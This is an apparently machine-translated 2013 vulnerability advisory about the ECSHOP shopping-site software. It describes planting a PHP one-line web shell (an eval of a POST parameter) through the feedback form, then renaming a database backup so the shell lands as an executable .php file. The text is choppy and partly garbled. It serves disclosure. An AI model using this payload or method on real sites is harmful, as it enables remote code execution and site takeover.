ECSHOP website program can bypass the permission to upload the word Trojan horse-vulnerability warning-the black bar safety net

2013-05-13T00:00:00
ID MYHACK58:62201338740
Type myhack58
Reporter heaven@乌云
Modified 2013-05-13T00:00:00

Description

Brief description:

You can bypass the permissions to upload the word Trojan

Detailed description:

!

The front Desk left a note, content is our word on Trojans:<? php eval($_POST[cmd]);?& gt;

!

Then in the background the system==>Database Management== > Data Backup==>select custom backup, selecting ecs_feedback this table store the message table

!

!

Backup file name: xxx.php;. sql this format to backup

!

Tips for a successful.

!

!